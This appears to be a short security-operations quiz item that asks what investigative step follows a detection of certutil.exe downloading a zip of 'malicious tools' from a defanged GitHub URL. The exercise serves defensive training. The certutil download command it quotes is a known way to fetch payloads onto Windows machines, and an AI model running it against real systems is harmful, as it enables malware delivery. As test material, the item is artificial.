You receive a detection on certutil.exe executing the following command line:
certutil -urlcache -split -f " hxxps[:]//github[.] com/Endizz/Payloads/raw/main/MyMaliciousTools.zip " " MyMaliciousTools.zip "
What is the appropriate next step to discover how this occurred?
Submit